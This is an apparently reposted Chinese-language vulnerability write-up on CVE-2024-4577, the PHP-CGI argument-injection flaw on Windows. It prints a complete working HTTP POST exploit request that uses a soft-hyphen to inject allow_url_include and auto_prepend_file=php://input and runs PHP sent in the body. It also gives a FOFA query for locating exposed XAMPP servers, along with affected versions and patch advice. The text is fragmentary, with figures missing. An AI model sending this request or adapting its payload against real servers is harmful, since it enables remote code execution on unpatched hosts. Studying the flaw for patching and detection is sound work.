1. 漏洞分析
1.1 分析
Figure 1-1
Figure 1-2
1.2 验证
-d allow_url_include=
1
-d auto_prepend_file=php:
//input
Fence 1-1
POST
/test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input
HTTP/1.1
Host
: {{host}}
User-Agent
: curl/8.3.0
Accept
: */*
Content-Length
: 23
Content-Type
: application/x-www-form-urlencoded
Connection
: keep-alive
phpinfo();
Fence 1-2
结果:
Figure 1-3
1.3 结论
2. 影响版本
-
PHP Windows版 8.3.0 <= 影响版本 < 8.3.8
-
PHP Windows版 8.2.0 <= 影响版本 < 8.2.20
-
PHP Windows版 8.1.0 <= 影响版本 < 8.1.29
-
PHP Windows版 影响版本 == 8.0.x
-
PHP Windows版 影响版本 == 7.x
-
PHP Windows版 影响版本 == 5.x
-
XAMPP Windows版 8.2.0 <= 影响版本 <= 8.2.12
-
XAMPP Windows版 8.1.0 <= 影响版本 <= 8.1.25
-
XAMPP Windows版 影响版本 == 8.0.x
-
XAMPP Windows版影响版本 == 7.x
-
XAMPP Windows版影响版本 == 5.x
3. FOFA
app
=
"XAMPP"
Fence 3-1
4. POC
5. 漏洞修复
目前,官方已发布修复建议,建议受影响的用户尽快升级至安全版本。
下载地址:https:
//www.php.net/downloads.php
Fence
原文始发于微信公众号(影域实验室):CVE-2024-4577
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论